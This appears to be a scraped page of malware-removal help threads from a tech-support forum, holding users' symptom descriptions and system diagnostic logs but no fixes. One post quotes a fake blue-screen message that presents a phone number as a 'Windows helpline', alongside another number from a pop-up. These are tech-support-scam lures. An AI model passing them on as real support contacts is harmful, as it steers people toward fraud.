2015-04-29 18:07:12 4096 ----a-w- C:\Windows\SysWow64\dxmasf.dll
2015-04-29 18:07:07 8192 ----a-w- C:\Windows\SysWow64\spwmp.dll
2015-04-29 18:05:19 12625408 ----a-w- C:\Windows\SysWow64\wmploc.DLL
.
============= FINISH: 19:22:34.40 ===============

Attached Files
File Type: txt attach.txt (10.9 KB)

virus that messes with keys

please excuse my grammar right now because that is the problem. for some reason i think a virus has messed with my keys and i am unable to use shift or alt.

whenever i use shift it's almost like they are being clicked at the same time. for example if i hold shift the underlines will appear in file, edit notepad. i can't use capitals at all and i know the keys haven't been swapped around because i tried using alt and that does not work either.

i have also tried going into language in control panel tried changing languages, moving one from the bottom to top and i tried all that and still get the same result.

i also tried restoring to a previous date and that did not work either, but i was not able to go very far back unfortunately which is possible that this error was occurring then i just did not realize

anyway if you have any ideas please let me know, i appreciate it

thank you

[SOLVED] can't use internet but have ip address and ping works ok???

Hi all,

new here so please go easy on me :)

I have a laptop that was riddled with viruses. Managed to download AVG and ran it and it took out 468 threats. Since that has run I cannot log onto the internet.

I have used command prompt ..... ipconfig/all and I have ip address. I have then on the command prompt used ping google.com and that they have come back as sent = 4 received -4 lost - 0 <0% loss>

but for some reason when I use Chrome or Internet Explorer, which are the only two internet programs I have, it just says no data received???

Any ideas or help would be great.

Thank you

Darren

Replay Media Catcher issue

I started an installation this morning of a program called Replay Media Catcher. Winpatrol popped up a warning that a program was installing itself in my startup registry and I rejected that change and tried to abort the installation. I then got the popup in attachment one, "file crashing Scotty.bmp". When I click "reject change" I get the popup in attachment two, "file crashing Scotty.bmp 2". When I select "Yes" on that popup I immediately get the popup in attachment three, "file crashing Scotty.bmp 3" and Winpatrol crashes. If I select "No" in that popup, it just keeps popping back up in an endless loop until I let it crash Winpatrol.

Replay Media Catcher was listed as being safe in my research, but it apparently is not. Help appreciated! :banghead:


I'm trying to set up security by using several programs, will they counter each other?

I try to set up my security by using:

Comodo Internet Security (antivirus disabled)

Avast as my antivirus

and Malwarebytes as my anti-malware.

Is this a good protection setup, or will those programs contradict each other?

BSOD on boot

Hey guys, I was sent here by the Microsoft BSOD forum, since they thought these bluescreens may be related to some kind of infection. My old thread is here:

hxxp://www.techsupportforum.com/forums/f299/blue-screens-on-boot-1004498.html

Basically on boot, the computer immediately bluescreens and restarts itself. I was able to boot into safe mode, but then my buddy just took a look at it and got a bit overzealous with uninstalling drivers to try and get rid of the BSOD, and now it can't boot into safe mode or with the last known good configuration either. I do have access to Windows installation media, and can burn other boot disks as needed. Since I couldn't boot it though, I can't run dds.scr... is there any way to run it from a boot disk or something?

Finally, I'll copy here the details about my laptop from the other thread:

· OS - Windows Vista Home Premium
· x86
· What was the original installed OS on the system? - Windows Vista Home Premium
· Is the OS an OEM version (came pre-installed on system) or full retail version (YOU purchased it from retailer)? - OEM
· Approximate age of system (hardware) - don't know (not my computer)
· Approximate age of OS installation (if you know) - don't know
· Have you re-installed the OS? - No

· CPU - Intel Core 2 Duo T6500
· Video Card - doesn't show up in dxdiag
· MotherBoard (if NOT a laptop)
· Power Supply - brand & wattage (if NOT a laptop)

· System Manufacturer - Dell
· Exact model number (if laptop, check label on bottom) - PP41L

Thank you so much in advance for any help or direction you might be able to give me!

Computer freezes sporadically like I have malware - just cleaned up, still bad

Hi all,

I run Microsoft Security Essentials, paired with Malware Antibytes Pro (Malware, not AV).

Once a week or more, I run AdwCleaner, and CCleaner.

I just uninstalled qBittorrent for First-steps and have DDS and HijackThis logs.

My CPU will run fine for several hours, then start freezing sporadically for 3-5 seconds, but normally only when I am connected to the internet (cable or Wifi).

This isn't just browsers, but all programs- video, iTunes, trying to type in MS Word, etc.

A month ago I just re-installed windows in a clean-wipe for Acer (so not completely clean, but I removed the Acer junk), since I had a bunch of Malware.

Now I feel like I picked up some more malware that isn't being found by my above programs, due to the entire system freezing sporadically when connected to the internet.

Sometimes it goes away after 2x restarts.


DDS pasted below:



DDS (Ver_2012-11-20.01) - NTFS_AMD64
Internet Explorer: 11.0.9600.17840
Run by xlrambling at 8:37:04 on 2015-06-20
Microsoft Windows 7 Home Premium 6.1.7601.1.1252.1.1033.18.3934.1683 [GMT -6:00]
.
AV: Microsoft Security Essentials *Enabled/Updated* {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}
SP: Microsoft Security Essentials *Enabled/Updated* {0C8D1929-27B2-688D-E114-9117BD2BB1B7}
SP: Windows Defender *Disabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
c:\Program Files\Microsoft Security Client\MsMpEng.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\WLANExt.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
c:\Windows\Prey\wpxsvc.exe
C:\Windows\System32\svchost.exe -k utcsvc
C:\Program Files\Acer\Acer ePower Management\ePowerSvc.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Program Files\Intel\iCLS Client\HeciServer.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
C:\Windows\Prey\current\bin\node.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
C:\Windows\system32\taskhost.exe
C:\Windows\system32\Dwm.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\Explorer.EXE
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
c:\Windows\Prey\versions\1.3.9\node_modules\triggers\bin\lightevt.exe
C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
c:\Program Files\Microsoft Security Client\NisSrv.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\system32\GWX\GWX.exe
C:\Windows\System32\igfxtray.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\System32\igfxpers.exe
C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
C:\Program Files\Elantech\ETDCtrl.exe
C:\Program Files\Acer\Acer ePower Management\ePowerTray.exe
C:\Windows\system32\igfxsrvc.exe
C:\Program Files\Microsoft Security Client\msseces.exe
C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\igfxext.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Program Files\Acer\Acer ePower Management\ePowerEvent.exe
C:\Program Files\Elantech\ETDCtrlHelper.exe
C:\Windows\System32\svchost.exe -k LocalServicePeerNet
C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
C:\Windows\system32\svchost.exe -k SDRSVC
C:\Windows\servicing\TrustedInstaller.exe
C:\Program Files (x86)\VideoLAN\VLC\vlc.exe
C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE
C:\Windows\splwow64.exe
C:\Windows\system32\taskhost.exe
C:\Program Files (x86)\Wisdom-soft ScreenHunter 6.0 Free\ScreenHunter.exe
C:\Program Files (x86)\Mozilla Firefox\firefox.exe
C:\Program Files (x86)\Notepad++\notepad++.exe
C:\Program Files (x86)\Mozilla Firefox\plugin-container.exe
C:\Users\xlrambling\AppData\Local\Google\Google Talk Plugin\googletalkplugin.exe
C:\Windows\system32\taskeng.exe
C:\Windows\SysWOW64\DllHost.exe
C:\Program Files (x86)\Windows Live\Installer\wlarp.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\svchost.exe -k swprv
C:\Windows\system32\msiexec.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\System32\cscript.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://acer.msn.com
uDefault_Page_URL = hxxp://acer.msn.com
mWinlogon: Userinit = userinit.exe
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
uRun: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
uRun: [f.lux] "C:\Users\xlrambling\AppData\Local\FluxSoftware\Flux\flux.exe" /noshow
uRun: [Google Update] "C:\Users\xlrambling\AppData\Local\Google\Update\GoogleUpdate.exe" /c
dRunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid}
mPolicies-Explorer: NoActiveDesktop = dword:1
mPolicies-Explorer: NoActiveDesktopChanges = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
IE: E&xport to Microsoft Excel - C:\PROGRA~2\MICROS~4\Office12\EXCEL.EXE/3000
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
IE: {92780B25-18CC-41C8-B9BE-3C9C571A8263} - {FF059E31-CC5A-4E2E-BF3B-96E929D65503}
IE: {A95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll/204
TCP: NameServer = 75.75.76.76 75.75.75.75
TCP: Interfaces\{513472FE-0CFD-4120-A3E8-58B3B1CF50C3} : DHCPNameServer = 75.75.76.76 75.75.75.75
TCP: Interfaces\{6838EE3D-728C-4CF4-9A6F-4655A3E94550} : DHCPNameServer = 75.75.76.76 75.75.75.75
TCP: Interfaces\{6838EE3D-728C-4CF4-9A6F-4655A3E94550}\3514C44502C414B4540234F4646454540224255414B4 : DHCPNameServer = 192.168.1.1
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
SSODL: WebCheck - <orphaned>
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "C:\Program Files (x86)\Google\Chrome\Application\43.0.2357.124\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
x64-BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
x64-Run: [IgfxTray] C:\Windows\System32\igfxtray.exe
x64-Run: [HotKeysCmds] C:\Windows\System32\hkcmd.exe
x64-Run: [Persistence] C:\Windows\System32\igfxpers.exe
x64-Run: [RTHDVCPL] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s
x64-Run: [ETDCtrl] C:\Program Files (x86)\Elantech\ETDCtrl.exe
x64-Run: [Power Management] C:\Program Files\Acer\Acer ePower Management\ePowerTray.exe
x64-Run: [MSC] "c:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
x64-Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - <orphaned>
x64-Notify: igfxcui - igfxdev.dll
x64-SSODL: WebCheck - <orphaned>
.
================= FIREFOX ===================
.
FF - ProfilePath - C:\Users\xlrambling\AppData\Roaming\Mozilla\Firefox\Profiles\44frtrc8.default-1428326091743\
FF - prefs.js: browser.startup.homepage - hxxps://www.google.com/
FF - plugin: C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll
FF - plugin: C:\Program Files (x86)\Google\Update\1.3.27.5\npGoogleUpdate3.dll
FF - plugin: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll
FF - plugin: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll
FF - plugin: c:\Program Files (x86)\Microsoft Silverlight\5.1.40416.0\npctrlui.dll
FF - plugin: C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
FF - plugin: C:\Users\xlrambling\AppData\Local\Google\Update\1.3.27.5\npGoogleUpdate3.dll
FF - plugin: C:\Users\xlrambling\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll
FF - plugin: C:\Users\xlrambling\AppData\Roaming\Mozilla\plugins\npo1d.dll
FF - plugin: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_17_0_0_188.dll
.
============= SERVICES / DRIVERS ===============
.
R0 MpFilter;Microsoft Malware Protection Driver;C:\Windows\System32\drivers\MpFilter.sys [2015-3-4 280376]
R2 NisDrv;Microsoft Network Inspection System;C:\Windows\System32\drivers\NisDrvWFP.sys [2014-11-15 124568]
R3 b57xdbd;Broadcom xD Picture Bus Driver Service;C:\Windows\System32\drivers\b57xdbd.sys [2011-11-4 68648]
R3 b57xdmp;Broadcom xD Picture vstorp client drv;C:\Windows\System32\drivers\b57xdmp.sys [2011-11-4 19496]
R3 bScsiMSa;bScsiMSa;C:\Windows\System32\drivers\bScsiMSa.sys [2011-9-2 51752]
R3 bScsiSDa;bScsiSDa;C:\Windows\System32\drivers\bScsiSDa.sys [2012-6-1 83576]
R3 ETD;ELAN PS/2 Port Input Device;C:\Windows\System32\drivers\ETD.sys [2013-3-20 238384]
R3 IntcDAud;Intel(R) Display Audio;C:\Windows\System32\drivers\IntcDAud.sys [2013-3-20 331264]
R3 k57nd60a;Broadcom NetLink (TM) Gigabit Ethernet - NDIS 6.0;C:\Windows\System32\drivers\k57nd60a.sys [2012-1-19 435240]
R3 MBAMProtector;MBAMProtector;C:\Windows\System32\drivers\mbam.sys [2015-4-5 25816]
R3 MBAMSwissArmy;MBAMSwissArmy;C:\Windows\System32\drivers\MBAMSwissArmy.sys [2015-4-5 136408]
R3 MBAMWebAccessControl;MBAMWebAccessControl;C:\Windows\System32\drivers\mwac.sys [2015-4-5 63704]
S3 TsUsbFlt;TsUsbFlt;C:\Windows\System32\drivers\TsUsbFlt.sys [2010-11-20 59392]
S3 TsUsbGD;Remote Desktop Generic USB Device;C:\Windows\System32\drivers\TsUsbGD.sys [2010-11-20 31232]
S3 WDC_SAM;WD SCSI Pass Thru driver;C:\Windows\System32\drivers\wdcsam64.sys [2015-3-11 14464]
.
=============== File Associations ===============
.
FileExt: .txt: Applications\notepad++.exe="C:\Program Files (x86)\Notepad++\notepad++.exe" "%1" [UserChoice]
.
=============== Created Last 30 ================
.
2015-06-20 13:50:55 75888 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{4A68611C-0C49-4EA8-A579-FEBCA8C63C1F}\offreg.912.dll
2015-06-20 13:46:49 12214312 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{4A68611C-0C49-4EA8-A579-FEBCA8C63C1F}\mpengine.dll
2015-06-19 01:44:36 1187344 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{C8BEC0FB-015F-497C-8AFE-F8AEFD4FD29E}\gapaengine.dll
2015-06-19 01:43:41 12214312 ----a-w- C:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2015-06-10 00:54:51 3206144 ----a-w- C:\Windows\System32\win32k.sys
2015-06-06 16:38:07 -------- d-----w- C:\Windows\en
2015-06-06 16:37:34 -------- d-----w- C:\Windows\fr
2015-06-06 16:37:30 -------- d-----w- C:\Windows\es
2015-06-06 16:37:25 -------- d-----w- C:\Windows\pt-br
2015-06-06 16:33:20 77656 ----a-w- C:\Windows\System32\XAPOFX1_5.dll
2015-06-06 16:33:20 74072 ----a-w- C:\Windows\SysWow64\XAPOFX1_5.dll
2015-06-06 16:33:20 527192 ----a-w- C:\Windows\SysWow64\XAudio2_7.dll
2015-06-06 16:33:20 518488 ----a-w- C:\Windows\System32\XAudio2_7.dll
2015-06-06 16:33:20 2526056 ----a-w- C:\Windows\System32\D3DCompiler_43.dll
2015-06-06 16:33:20 2106216 ----a-w- C:\Windows\SysWow64\D3DCompiler_43.dll
2015-06-06 16:33:19 276832 ----a-w- C:\Windows\System32\d3dx11_43.dll
2015-06-06 16:33:19 248672 ----a-w- C:\Windows\SysWow64\d3dx11_43.dll
2015-06-06 16:31:37 6081224 ----a-w- C:\Program Files (x86)\Common Files\Windows Live\.cache\e11465841d0a07502\onedrivesetup.exe
2015-06-06 16:31:37 -------- d-----w- C:\Program Files (x86)\Microsoft OneDrive
2015-06-06 16:31:35 -------- d-----r- C:\Users\xlrambling\OneDrive
2015-06-06 16:31:11 -------- d-----w- C:\ProgramData\Microsoft OneDrive
2015-06-06 16:29:08 525656 ----a-w- C:\Program Files (x86)\Common Files\Windows Live\.cache\e716b91a1d0a07504\DXSETUP.exe
2015-06-06 16:29:07 94040 ----a-w- C:\Program Files (x86)\Common Files\Windows Live\.cache\e716b91a1d0a07504\DSETUP.dll
2015-06-06 16:29:07 1691480 ----a-w- C:\Program Files (x86)\Common Files\Windows Live\.cache\e716b91a1d0a07504\dsetup32.dll
2015-06-06 16:29:03 89944 ----a-w- C:\Program Files (x86)\Common Files\Windows Live\.cache\e42226261d0a07503\DSETUP.dll
2015-06-06 16:29:03 537432 ----a-w- C:\Program Files (x86)\Common Files\Windows Live\.cache\e42226261d0a07503\DXSETUP.exe
2015-06-06 16:29:03 1801048 ----a-w- C:\Program Files (x86)\Common Files\Windows Live\.cache\e42226261d0a07503\dsetup32.dll
2015-06-06 16:28:53 89944 ----a-w- C:\Program Files (x86)\Common Files\Windows Live\.cache\df7296451d0a07501\DSETUP.dll
2015-06-06 16:28:53 537432 ----a-w- C:\Program Files (x86)\Common Files\Windows Live\.cache\df7296451d0a07501\DXSETUP.exe
2015-06-06 16:28:53 1801048 ----a-w- C:\Program Files (x86)\Common Files\Windows Live\.cache\df7296451d0a07501\dsetup32.dll
2015-06-06 16:28:49 -------- d-----w- C:\Users\xlrambling\AppData\Local\Windows Live
2015-06-01 23:44:06 -------- d-----w- C:\Users\xlrambling\AppData\Local\GWX
.
==================== Find3M ====================
.
2015-06-20 13:32:31 136408 ----a-w- C:\Windows\System32\drivers\MBAMSwissArmy.sys
2015-06-11 03:41:25 778416 ----a-w- C:\Windows\SysWow64\FlashPlayerApp.exe
2015-06-11 03:41:25 142512 ----a-w- C:\Windows\SysWow64\FlashPlayerCPLApp.cpl
2015-05-25 18:24:00 5569984 ----a-w- C:\Windows\System32\ntoskrnl.exe
2015-05-25 18:23:59 95680 ----a-w- C:\Windows\System32\drivers\ksecdd.sys
2015-05-25 18:23:59 155584 ----a-w- C:\Windows\System32\drivers\ksecpkg.sys
2015-05-25 18:21:21 1728960 ----a-w- C:\Windows\System32\ntdll.dll
2015-05-25 18:18:56 43520 ----a-w- C:\Windows\System32\csrsrv.dll
2015-05-25 18:18:56 22016 ----a-w- C:\Windows\System32\credssp.dll
2015-05-25 18:18:54 879104 ----a-w- C:\Windows\System32\advapi32.dll
2015-05-25 18:18:45 47104 ----a-w- C:\Windows\System32\typeperf.exe
2015-05-25 18:18:45 404992 ----a-w- C:\Windows\System32\tracerpt.exe
2015-05-25 18:18:39 112640 ----a-w- C:\Windows\System32\smss.exe
2015-05-25 18:18:32 296960 ----a-w- C:\Windows\System32\rstrui.exe
2015-05-25 18:18:30 43008 ----a-w- C:\Windows\System32\relog.exe
2015-05-25 18:18:19 31232 ----a-w- C:\Windows\System32\lsass.exe
2015-05-25 18:18:19 104448 ----a-w- C:\Windows\System32\logman.exe
2015-05-25 18:18:11 19456 ----a-w- C:\Windows\System32\diskperf.exe
2015-05-25 18:18:08 338432 ----a-w- C:\Windows\System32\conhost.exe
2015-05-25 18:18:04 64000 ----a-w- C:\Windows\System32\auditpol.exe
2015-05-25 18:14:26 60416 ----a-w- C:\Windows\System32\msobjs.dll
2015-05-25 18:14:04 146432 ----a-w- C:\Windows\System32\msaudite.dll
2015-05-25 18:07:34 3989440 ----a-w- C:\Windows\SysWow64\ntkrnlpa.exe
2015-05-25 18:07:34 3934144 ----a-w- C:\Windows\SysWow64\ntoskrnl.exe
2015-05-25 18:04:08 1310744 ----a-w- C:\Windows\SysWow64\ntdll.dll
2015-05-25 18:00:44 40448 ----a-w- C:\Windows\SysWow64\typeperf.exe
2015-05-25 18:00:40 364544 ----a-w- C:\Windows\SysWow64\tracerpt.exe
2015-05-25 18:00:28 25600 ----a-w- C:\Windows\SysWow64\setup16.exe
2015-05-25 18:00:25 37888 ----a-w- C:\Windows\SysWow64\relog.exe
2015-05-25 18:00:17 82944 ----a-w- C:\Windows\SysWow64\logman.exe
2015-05-25 18:00:09 17408 ----a-w- C:\Windows\SysWow64\diskperf.exe
2015-05-25 18:00:04 50176 ----a-w- C:\Windows\SysWow64\auditpol.exe
2015-05-25 17:59:52 96768 ----a-w- C:\Windows\SysWow64\sspicli.dll
2015-05-25 17:59:52 5120 ----a-w- C:\Windows\SysWow64\wow32.dll
2015-05-25 17:59:51 274944 ----a-w- C:\Windows\SysWow64\KernelBase.dll
2015-05-25 17:57:31 60416 ----a-w- C:\Windows\SysWow64\msobjs.dll
2015-05-25 17:57:15 146432 ----a-w- C:\Windows\SysWow64\msaudite.dll
2015-05-25 17:00:56 36864 ----a-w- C:\Windows\System32\UtcResources.dll
2015-05-25 16:50:38 7680 ----a-w- C:\Windows\SysWow64\instnm.exe
2015-05-25 16:50:36 2048 ----a-w- C:\Windows\SysWow64\user.exe
2015-05-25 16:48:25 6144 ---ha-w- C:\Windows\SysWow64\api-ms-win-security-base-l1-1-0.dll
2015-05-25 16:48:25 4608 ---ha-w- C:\Windows\SysWow64\api-ms-win-core-threadpool-l1-1-0.dll
2015-05-25 16:48:25 3584 ---ha-w- C:\Windows\SysWow64\api-ms-win-core-xstate-l1-1-0.dll
2015-05-25 16:48:25 3072 ---ha-w- C:\Windows\SysWow64\api-ms-win-core-util-l1-1-0.dll
2015-05-23 03:28:17 2724864 ----a-w- C:\Windows\SysWow64\mshtml.tlb
2015-05-23 03:15:54 503808 ----a-w- C:\Windows\SysWow64\vbscript.dll
2015-05-23 03:15:40 62464 ----a-w- C:\Windows\SysWow64\iesetup.dll
2015-05-23 03:15:02 47616 ----a-w- C:\Windows\SysWow64\ieetwproxystub.dll
2015-05-23 03:14:51 341504 ----a-w- C:\Windows\SysWow64\html.iec
2015-05-23 03:13:48 64000 ----a-w- C:\Windows\SysWow64\MshtmlDac.dll
2015-05-23 03:05:21 115712 ----a-w- C:\Windows\SysWow64\ieUnatt.exe
2015-05-23 03:04:50 620032 ----a-w- C:\Windows\SysWow64\jscript9diag.dll
2015-05-23 02:52:43 60416 ----a-w- C:\Windows\SysWow64\JavaScriptCollectionAgent.dll
2015-05-23 02:47:31 4305920 ----a-w- C:\Windows\SysWow64\jscript9.dll
2015-05-23 02:37:45 2052608 ----a-w- C:\Windows\SysWow64\inetcpl.cpl
2015-05-23 02:37:25 1155072 ----a-w- C:\Windows\SysWow64\mshtmlmedia.dll
2015-05-23 02:20:35 1950720 ----a-w- C:\Windows\SysWow64\wininet.dll
2015-05-22 19:16:55 2724864 ----a-w- C:\Windows\System32\mshtml.tlb
2015-05-22 19:16:44 4096 ----a-w- C:\Windows\System32\ieetwcollectorres.dll
2015-05-22 19:01:42 66560 ----a-w- C:\Windows\System32\iesetup.dll
2015-05-22 19:00:54 48640 ----a-w- C:\Windows\System32\ieetwproxystub.dll
2015-05-22 19:00:47 417792 ----a-w- C:\Windows\System32\html.iec
2015-05-22 19:00:25 584192 ----a-w- C:\Windows\System32\vbscript.dll
2015-05-22 18:59:27 88064 ----a-w- C:\Windows\System32\MshtmlDac.dll
2015-05-22 18:52:21 6026240 ----a-w- C:\Windows\System32\jscript9.dll
2015-05-22 18:47:49 144384 ----a-w- C:\Windows\System32\ieUnatt.exe
2015-05-22 18:47:34 114688 ----a-w- C:\Windows\System32\ieetwcollector.exe
2015-05-22 18:47:03 814080 ----a-w- C:\Windows\System32\jscript9diag.dll
2015-05-22 18:40:17 968704 ----a-w- C:\Windows\System32\MsSpellCheckingFacility.exe
2015-05-22 18:29:31 77824 ----a-w- C:\Windows\System32\JavaScriptCollectionAgent.dll
2015-05-22 18:18:41 700416 ----a-w- C:\Windows\System32\generaltel.dll
2015-05-22 18:18:29 757248 ----a-w- C:\Windows\System32\invagent.dll
2015-05-22 18:18:24 423424 ----a-w- C:\Windows\System32\devinv.dll
2015-05-22 18:18:22 1021440 ----a-w- C:\Windows\System32\appraiser.dll
2015-05-22 18:18:21 45568 ----a-w- C:\Windows\System32\acmigration.dll
2015-05-22 18:18:21 227328 ----a-w- C:\Windows\System32\aepdu.dll
2015-05-22 18:13:03 1119232 ----a-w- C:\Windows\System32\aeinv.dll
2015-05-22 18:05:28 1359360 ----a-w- C:\Windows\System32\mshtmlmedia.dll
2015-05-22 18:05:06 2125824 ----a-w- C:\Windows\System32\inetcpl.cpl
2015-05-22 17:50:20 2426880 ----a-w- C:\Windows\System32\wininet.dll
2015-05-21 13:19:52 193536 ----a-w- C:\Windows\System32\aepic.dll
2015-05-01 13:17:03 124112 ----a-w- C:\Windows\System32\PresentationCFFRasterizerNative_v0300.dll
2015-05-01 13:16:41 102608 ----a-w- C:\Windows\SysWow64\PresentationCFFRasterizerNative_v0300.dll
2015-04-29 18:21:50 5120 ----a-w- C:\Windows\System32\msdxm.ocx
2015-04-29 18:21:50 5120 ----a-w- C:\Windows\System32\dxmasf.dll
2015-04-29 18:21:46 9728 ----a-w- C:\Windows\System32\spwmp.dll
2015-04-29 18:19:43 12625920 ----a-w- C:\Windows\System32\wmploc.DLL
2015-04-29 18:07:12 4096 ----a-w- C:\Windows\SysWow64\msdxm.ocx
2015-04-29 18:07:12 4096 ----a-w- C:\Windows\SysWow64\dxmasf.dll
2015-04-29 18:07:07 8192 ----a-w- C:\Windows\SysWow64\spwmp.dll
2015-04-29 18:05:19 12625408 ----a-w- C:\Windows\SysWow64\wmploc.DLL
2015-04-24 18:17:26 633856 ----a-w- C:\Windows\System32\comctl32.dll
2015-04-24 17:56:58 530432 ----a-w- C:\Windows\SysWow64\comctl32.dll
2015-04-24 15:56:57 29 ----a-w- C:\Windows\SysWow64\TempWmicBatchFile.bat
2015-04-20 03:17:07 1647104 ----a-w- C:\Windows\System32\DWrite.dll
2015-04-20 03:17:07 1179136 ----a-w- C:\Windows\System32\FntCache.dll
2015-04-20 02:56:29 1250816 ----a-w- C:\Windows\SysWow64\DWrite.dll
2015-04-18 03:10:57 460800 ----a-w- C:\Windows\System32\certcli.dll
2015-04-18 02:56:57 342016 ----a-w- C:\Windows\SysWow64\certcli.dll
2015-04-14 15:37:56 63704 ----a-w- C:\Windows\System32\drivers\mwac.sys
.
============= FINISH: 8:42:28.46 ===============

unable to access AVG

The problem started after I was taking some files from a teacher via my pendrive.
The contents were made shortcuts by a virus.
I knew it was a virus but I still double-clicked it and it popped out some error.
After that I right-clicked on the SHORTCUT and clicked SCAN WITH AVG,
and I could no longer see AVG running anywhere.
I tried to run AVG from its installed directory with administrator rights but it says "windows cannot access the specified path, device or file."
I can neither uninstall AVG nor Repair. Help.

Blue Screen - Adequate Disk space

I had tried to download a driver for my printer. After doing so, I received an error message and a warning box that came down and said call 1-844-546-2998. Norton remotely went through my computer and removed any virus that may have been there. They said that the blue screen has to be a Microsoft problem and call them about the driver issue. I have no clue where to go from here. If I hit Ctrl+Alt+delete, I can get to my homepage but, after about 30 seconds, it goes directly back to the blue screen.

The blue screen says:

"A problem has been detected and windows has been shut down to prevent damage to your computer.

If this is the first time you've seen this stop error screen, restart your computer. If a driver is identified in the stop message, disable the driver or check with the manufacturer for driver updates. Try changing video adapters.

Check with your hardware vendor for any bios updates. Disable BIOS memory options such as caching or shadowing. If you need to use Safe Mode to remove or disable components, restart your computer, press F8 to select Advanced Startup Options, and then select Safe Mode.

For technical support to this problem, call Windows helpline: +1-888-991-9974.

Technical Information:

*** STOP: 0x0000001E (0xFFFFFFFFC00000094,0xFFFFFF8000C074D1E,0x000000000,0xFFFFFFFFFFD)"

another virus...

I have 2 threats popping up on AVG when I load Chrome along with a cookies4.DAT error? and the machine is slow.

I also cannot get into safe mode to remove some programs that won't delete in normal mode. I have held down F8 at the Dell logo, tapped F8, tapped F5... still cannot get the safe mode menu. :banghead:

This is a Dell Vostro 1700 with Windows 7 Ultimate.

I will post logs once I am able to get into safe mode.

My Help Thread: Get Rid Of Javascript Injection

My problem is the way one of my sites worked after I downloaded a file I did not want to. The file, which was off of 4shared (website), was not the right file and installed many programs to my computer. I got rid of those programs with "Programs and Features" in the "Control Panel" as well as "Revo Uninstaller" to get rid of those that would not delete. I thought things would work properly... I did several scans with Vipre (my antivirus) and when it wanted me to restart my computer, I did. After the restart, my homescreen background was fixed around which I did not know why. Then from there, I made sure things were "ok" again and I did another Vipre scan as well as a Windows Defender scan. I checked my browser (Firefox), and Audiotool (website), which I usually use all the time, did not seem to be working right. I tried different browsers but it just would not seem to load from link to link. The app in the site would not work as well. My only concern is the Audiotool website. I don't know if that bad file put other bad things in my computer, but I really quite want this site to work for me. My flash player is fine and I also tried clearing cache as well as site cookies. I did research and found out that the file may have been a Javascript Injection. When I looked at the source information for the site, I found one in there.
I only found one person online with the same exact problem as mine with the injection, but they never had it fixed. I cannot give out links; therefore, I'll only hand out the script:
